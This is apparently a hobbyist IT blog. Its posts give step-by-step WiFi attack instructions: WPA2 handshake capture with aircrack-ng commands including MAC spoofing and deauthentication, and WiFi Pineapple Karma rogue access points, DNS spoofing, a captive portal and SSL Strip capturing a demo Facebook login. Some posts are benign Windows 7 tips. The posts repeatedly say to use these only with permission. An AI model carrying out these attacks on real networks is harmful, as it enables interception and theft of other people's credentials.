Capturing a WPA handshake.

So latest up date I had an interview about a week ago, walked out of there feeling great. Looks like it payed off, was offered the job and am just finalising the contracts now.

Lets get on to something more interesting than my boring life.
Without getting in to too much WiFi theory to get on to a WPA2 WiFi network the fist step is to capture the WPA handshake.
This is a 4 way handshake between the AP and device that initiates the connection. Basically the AP and device confirming what the pre-shared key is.
I am not trying to teach WiFi theory or anything like that just pass on my process for capturing handshakes, as always you should only be doing this to equipment you own or have permission to audit.

Now you have to start with a WiFi radio that supports packet injection and monitor mode. Offensive Security has a list of suggested hardware here for their WiFu course.  Now aircrack-ng is available no windows but I prefer to use Kali Linux.

Now first thing to do is to bring up a monitor interface and personally set a custom MAC address and disable the wlan0 device.

The next step is to run airodump-ng I normally run this twice the first time for reconnaissance, to get my target ESSID , BSSID and channel.

My attack run I use this command:
"airodump-ng --bssid 20:2B:C1:6B:D8:C5 -c 11 -w BTHub3-3M6H --output-format pcap mon0"
Now lets just break this down a little.
--bssid filters by the bssid of the desired AP
-c locks mon0 on to the desired channel
-w names the capture file the out put would be "/root/BTHub3-3M6H-01.cap"the id number at the end will increment.
--output-format sets the desired format of the output file.
Once this has been run you will get an updating output.

Now as you can see we have detected the AP and a client, in this case my iPhone. In order to capture the WPA handshake we need to de-authenticate the client from the AP.

One thing to be careful of at this stage is flooding with deauth's ( -0 attribute ) this exposes the attack as you are actually transmitting, using my method you are only sending 1 deauth so you may need to rerun this command to capture the WPA handshake.

You have now captured a WPA handshake and can go on to break it using a variety of methods.

Here is my You Tube video to go along with this post.

Now here is a list of every command used - items inside {} are variables that you need to set.

airmon-ng start {wifi interface}
ifconfig {wifi interface} down
ifconfig {monitor interface} down
macchanger -m{desired MAC address} {monitor interface}
ifconfig {monitor interface} up
airodump-ng {monitor interface}
airodump-ng --bssid {bssid} -c {channel} -w {title} --output-format pcap {monitor interface}
airepaly-ng -0 1 -a {bssid} -c {client MAC} {monitor interface}

Looks like I have been silent.

Well hi looks like I have been neglecting my blog. Well in the last few months I have been given notice on my current contract, I have a few weeks left working at my current site and don't yet have a replacement. Good job that I have some savings, I could take a long holiday and I would end up maybe making a few more posts but is anyone even reading this?

So what have I been doing mostly studying for my MCSA on Server 2012, and guess what I have passed. I'm now looking for infrastructure jobs so here is hoping I can get a nice job in London.

I really do need to get my shit together a new WiFi Pineapple firmware was released at DEFCON, witch I once again missed really hoping to make the trip to Vegas next year. Its now 03:14 and I'm hoping to get something on here at the weekend, I'm currently studying for CCENT so I am hoping that I will be able to do something along the network side of life.

Pineapple Firmware 1.3.0 Salmonosaurus & Evil Portal

Salmonosaurus

Well the good people of Hak5 have gone and released another update for the Wi-Fi Pineapple.

 so lets start with the details of the changelog.
Changelog:

Merged upstream changes
Updated wireless drivers.
Updated wireless utilities.
Updated OpenSSL (fixed heartbleed).
Updated some other base components.
Updated hostapd.as

Improved WiFi Stability
More stable AP.
More stable clientmode.

Karma
Faster response times.
Cleaner, more concise log output.
Timestamps added to log
Much faster webinterface view of log

Removed the need to re-boot after initial set-up (first boot).
Added proper vFat support
Updated all system infusions to their latest versions
Security fixes 
Other minor fixes and improvements.

All of this can be found in the Hak5 forums.

I had no issues with the update and have had no issues so far.

Evil Portal

Now to get started I would suggest watching Chris Haralson's How to video on the captive portal, I have found his videos really helpful http://youtu.be/nw4bo4rXGgQ.

After installing the infusion from the Pineapple Bar, you will then need to install the dependencies.
Once complete you can start moving forward.

The first tab details all of the configuration changes you will need to make, the next two configure the UHTTP Deamon and NoDogSplash, the two tabs are for editing and previewing the splash.




The configuration changes made to UHTTP Deamon and NoDogSplash are also covered in the video.
UHTTP Deamon - Change "list listen_http 0.0.0.0:80" to  "list listen_http 0.0.0.0:8080"
NoDogSplash - Add to "FirewallRuleSet users-to-router"
"FirewallRule akkow TCP port 8080"

"FirewallRule akkow TCP port 1471"

At this point don't forget to restart the UHTTP Deamon before starting NoDogSplash.
Now this is where I have differed from Chris, Chris created a portal that worked as you would expect you preform a particular function and you get access to the web. I just prefer to mess with people, or should I say myself as doing this in the wild can be viewed as illegal. So my captive portal is just a ASCII art skull and crossbones that plays a creepy laugh with not click though.

One note to point out is you are limited by the internal storage space of the pineapple, I was unable to get the creepy laugh working but the main HTML page worked so I was happy.
Remember that this should only be done on your own equipment or equipment that you have permission to work on.

Windows 7 auto log in.

Well after spending a lot of time on WiFi Pineapples shall we head back to Windows 7.

May of you may not remember computers pre Windows XP, we never had to log in to a system, it used to just start up ready for us.

My desktop doesn't travel around, any I am the only person with access, so why should I have to type in my password to get access? Don't get me wrong my laptop does travel and as a result has a password and full drive encryption.

Now this is the same case with my mother, but I don't want her having admin access to her computer, that would only make more work for me in the long run. As this is the second time I have had to reinstall a full OS for her.
 The default log in account can be a user or an admin, bear in mind if the user attempts to access and admin feature they will be prompted for the admin's password (installed team viewer for my Mum).

Less of my life and lets get into this nice quick tip.

Open the run command by pressing GUI+r.

type in "control userpasswords2" and yes without the quotes.

Then click Apply.

At this point you will be prompted for your password.

Now after the next boot you will be delivered to your desktop.

Don't forget what your password is, you may still want to lock your computer when friends come around or if you have set your computer to prompt for a password after recovering from screensaver.

So I think the next one will have to be how to reset your password if you forget it.

WiFi Pineapple SSL Strip

SSL is used for secured traffic on websites, while it was first used on banking and shopping websites, it is now used by twitter, facebook and even google.

After the firefox extension Firesheep received mainstream media coverage pretty much all social media sites defaulted to HTTPS / SLL, previously most of these website offered HTTPS as an option within the security settings but most users did not know how to enable this or how important it was.

Now SSL would protect you from a man in the middle attack like firesheep but SSL Strip is another MITM attack.

Now the first thing you should be doing is updating to the latest WiFi Pineapple firmware version 1.1.0.
Flashing is very easy just open the WiFi Pineapple MK5 large tile and check for upgrades, flashing takes a few minutes so you may have to put some time aside for this.

Getting started is easy as with all others just click start in the small tile - you can look at the log file in the small tile but I would suggest opening up the large tile.
I attempted to access facebook I had a few problems getting the infusion to log any data, as I was using Chrome that I was logged into was forcing me to use HTTPS as but after logging out and manually typing in www.facebook.com.

I will be logging into facebook with the accoutn chump@facbook.com and the password "lamepassword"



Even though I prefer using the large tile interface, the it turns out the small tile was best for demonstrating on here.

As you can see this has reported a username and password.

You do have to pick it out but 3rd line from the bottom you can see
"&email=chump%40facebook.com"
"&pass=lamepassword"

The reason that the @ symbol is not displayed is because of Percent-encoding or URL encoding.
I won't be covering this in depth basically some characters are unsupported and need to be re-encoded. If you have ever cut and pasted a URL and accidentally included a space you would see that space replaced with %20, for further reading please see the Wikipedia page here and I also found a useful table here.

Remember to keep safe and only exploit systems you have the correct authorisation for.

WiFi Pineapple Random Roll

WiFi Pineapple Random Roll

I'm not too sure if anyone out there is actually following this blog or not but for the 1 or 2 of you out there I have been away for a month or so after getting sick, once I got better I had lost my motivation - this has now returned.

So lets stat with Random Roll, this is a Pineapple Bar Infusion, free space required is 18954kb - so you will only be able to install this on to your SD card. Random Roll installs 7 "rolls" on to your system. including Nyan cat, Peanut Butter Jelly Time and Circus  Afro.

After installation you can decided to run 1 or a multiple of the rolls on a random setting, don't forget to start the service - I spent 15 minutes head scratching with this once.

Without any further configuration any user on the Pineapples network will only be rolled if the attempt to access 172.16.42.1.

After configuring DNS Spoof you will be able to direct certain websites - or if you would prefer all websites to 172.16.42.1 to roll everyone.

Now as I said in my last post if you misuse these tools you can land yourself in legal trouble, only use these tools when you have permission.

My next post will be on SSL Strip with the Pineapple and hopefully by that time I would have sorted out getting my youtube account up and running the first 2 videos will be on Karma, Random Roll and SSL Strip. Any suggestions or requests please leave a comment or PM me.

Wi-Fi Pineapple DNS Spoof

DNSSpoof

Introduction

DNSSpoof allows you Pineapple to reroute requests for websites to a particular IP address.
So dumbing it down again, when you type a website name into your browser DNS is used to resolve the IP of the webserver that is hosting the website you are looking for. One example would be using command prompt to ping a website.

In a windows environment the first place that will be checked is
C:\Windows\System32\drivers\etc\hosts
 If you are working within an enterprise environment you can edit this file to resolve a simple name for network devices that do not get published in DNS, like switches.


Editing the host file as shown will redirect requests for google.com

A real world application would be if I had a switch n my network call "switch1" with the IP address of 10.0.0.3 I could edit my host file so that I do not have to keep track of the IP address, handy if you have many switches on an enterprise network.

 

So DNSSpoof will redirect any requests for a website to an IP that you decide.

 

Operation

DNSSpoof is available when you initially set up your Pineapple, so no infusions to install for this application. To state the obvious you first have to enable DNSSpoof.

You can now redirect DNS requests to the pineapple or anywhere else you wish by editing the

if you replace a website name with an asterisk (*) all DNS requests will be forwarded to your chosen IP address.

 

 

As always stay safe remember that this  is not illegal to do any of this on your own equipment or equipment that you have the permission to work on. In the current climate even what we may view as minor mischief can be prosecuted. Please look forward to my next post that will be on the Random Roll infusion.

WiFi Pineapple and Karma.

Well it would appear that this is the 2^nd time I am writing this blog, as I was a complete idiot and somehow managed to delete the post while it was still in draft I could not find the data, but it does mean that I get to watch some more Elementary.

Let's look at the WiFi Pineapple, a security auditing tool that exploits the inherent security flaws in unencrypted WiFi security.

The WiFi Pineapple is produced by Hak5 and sold in the HakShop.

The WiFi Pineapple works as a router, this is not to be confused with the Netgear or Linksys router in your house, the Pineapple has two wireless radios, one Ethernet port and one USB.

So I received my WiFi Pineapple on Friday and have been in experiment mode ever since.

The Pineapple arrives completely blank but the latest firmware is included on a microSD card,  the whole process is automated and provided you follow the guide that is included or watch the videos on Hak5 you should have no issues.

Applications that run on the Pineapple are called "Infusions" some are included and many are online in the Pineapple Bar.

The particular application I am looking at talking about is Karma.

I won't be going in depth on the theory as this has been covered many times on Hak5.

When your laptop or phone come online they send out probe requests looking for networks that they have attached to previously. This list can be found on a Windows PC by clicking on "Manage Wireless Networks" link within the Network and Sharing Center. 

 The best way to access Karma is through the Pineapple web interface.

Now let's state the obvious, you click on "Start" Karma will start. Clicking "Enable" will not start Karma but will automatically start the next time the Pineapple reboots, handy if you don't want to get your laptop out and log into the Pineapple. Clicking on "Karma" will open the Karma interface, within the interface there are three pages; Karma Intelligence Report, Karma Log, Karma Configuration.

 

Karma Intelligence displays the MAC address, assigned IP address, Hostname and the assumed SSID. I have edited the hostnames and MAC addresses to protect myself and the stupid person that connected while I was taking screenshots (first time I managed to pick anyone else up).

 

Karma Log holds information on all probe requests received and all clients that have connected.



 

An  finally Karma Configuration is where you can set the broadcast SSID of the Pineapple, Client Blacklisting where you can set clients that the Pineapple will not respond to, and SSID Black/White Listings where you can configure what SSID's the Pineapple responds as.

 

So in conclusion the WiFi Pineapple can make you a man in the middle, you can be the one that people connect to for internet access. And how can you protect yourself from this kind of attack, well don't connect to any unsecured networks, if you do don't all that network to connect automatically. Always make sure you know what you are connecting to.

New arrivals.

I have received my USB Rubber Ducky and WiFi Pineapple today.
Thanks Hak5 for the holiday sales.

The next few instalments will be featuring the WiFi Pineapple so please keep an eye out over the next few weeks.

Begining

Well where to start?

 I’m Mat the Grinch and have been working in the IT/Comms industry for 13 years now. Being that I am at the grand old age of 30 I have not even attempted to side step into another industry by now I am probably in here for life, not that that is a bad thing.

So I currently work as an IT contractor, my current position is network monitoring which is cool apart from the fact that every day is 12 hours long, when you get to day 4 it is a long day. But realistically I probably spend around 15 hours a day at a computer, as a result I have quite a few IT tips and tricks that I am going to try to share with you.

So this week we will be making a custom login screen for Windows 7, yes Windows 7 not 8. I think you know why.





Now the tricky bit navigate to this area of the registry using regedit.

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background

Change the value of OEMBackground to 1.

So first we need a picture that is not larger than 256kb.

Now name the file backgroundDefault.jpg

 Place the JPEG into the folder “C:\Windows\System32\oobe\info\backgrounds” if the backgrounds folder is not there just create it.
 There is no need to reboot just press windows + L to lock and you now have a customised log on screen.

Well as I am sitting here at 0900 in the morning after working a 12 hour night shift I may as well tell you what the plan is for my next post.
Fun with a WiFi Pineapple - I am actually staying up this morning awaiting my delivery of a Mark V pineapple so you can expect some Pinappley goodness pretty soon.

If you would like to find out more about the WiFi Pineapple please check out Hak5 on youtube.

That's all for today any feedback is always welcome.